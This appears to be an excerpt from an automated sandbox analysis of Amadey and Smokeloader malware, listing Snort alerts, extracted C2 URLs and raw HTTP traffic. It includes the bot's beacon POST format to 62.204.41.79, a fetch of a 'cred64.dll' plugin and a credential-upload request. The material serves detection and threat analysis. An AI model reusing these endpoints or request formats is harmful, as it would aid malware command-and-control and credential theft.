                              Source: unknownHTTPS traffic detected: 23.35.236.109:443 -> 192.168.2.3:49697 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 185.98.131.207:443 -> 192.168.2.3:49723 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 20.190.159.19:443 -> 192.168.2.3:49728 version: TLS 1.2
                              Source: Binary string: /C:\ziperokelodofu\gukeheyamufuji\cutovalajoz_cowadulolidako3.pdb source: kmxId0uLRn.exe, thgcici.1.dr
                              Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: 9545.exe, 0000000E.00000000.403314322.0000000000E00000.00000002.00000001.01000000.0000000A.sdmp, 9545.exe, 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmp, 9545.exe, 0000000E.00000003.404330166.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000000.418195979.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe, 00000015.00000002.789042996.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe, 0000001D.00000000.425079213.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe, 0000001D.00000002.430617953.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe, 0000002C.00000000.542142836.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe, 0000002C.00000002.547939259.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe.14.dr, 9545.exe.1.dr
                              Source: Binary string: C:\ziperokelodofu\gukeheyamufuji\cutovalajoz_cowadulolidako3.pdb source: kmxId0uLRn.exe, thgcici.1.dr
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C2A284 FindFirstFileExW,
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DF1396 FindFirstFileExW,

                              Networking

                              barindex
                              Source: C:\Windows\explorer.exeNetwork Connect: 31.41.244.228 80
                              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 62.204.41.79 80
                              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.3 80
                              Source: C:\Windows\explorer.exeDomain query: r3oidsofsios.com
                              Source: C:\Windows\explorer.exeDomain query: kikangalaassociates.com
                              Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.3:49699 -> 185.246.221.151:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49735 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49738 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49739 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49740 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49741 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49742 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49743 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49744 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49745 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49746 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49747 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49748 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49749 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49750 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49751 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49752 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49753 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49754 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49756 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49757 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49759 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49760 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49761 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49762 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49764 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49765 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49766 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49767 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49768 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49769 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49770 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49771 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49772 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49774 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49775 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49776 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49777 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49778 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49779 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49780 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49781 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49782 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49783 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49784 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49785 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49786 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49787 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49788 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49789 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49790 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49791 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49792 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49793 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49794 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49795 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49796 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49797 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49798 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49799 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49800 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49801 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49802 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49803 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49804 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49805 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49806 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49807 -> 62.204.41.79:80
                              Source: Malware configuration extractorURLs: 62.204.41.79/fb73jc3/index.php
                              Source: Malware configuration extractorURLs: http://s2scomm20.com/
                              Source: Malware configuration extractorURLs: http://c2csosi228d.com/
                              Source: Malware configuration extractorURLs: http://xdd42sdfsdf.com/
                              Source: Malware configuration extractorURLs: https://t.me/ttruelive
                              Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199443972360
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODEyODY=Host: 62.204.41.79Content-Length: 81438Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: GET /fb73jc3/Plugins/cred64.dll HTTP/1.1Host: 62.204.41.79
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Host: 62.204.41.79Content-Length: 21Content-Type: application/x-www-form-urlencodedData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 63 72 65 64 3d Data Ascii: id=853321935212&cred=
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
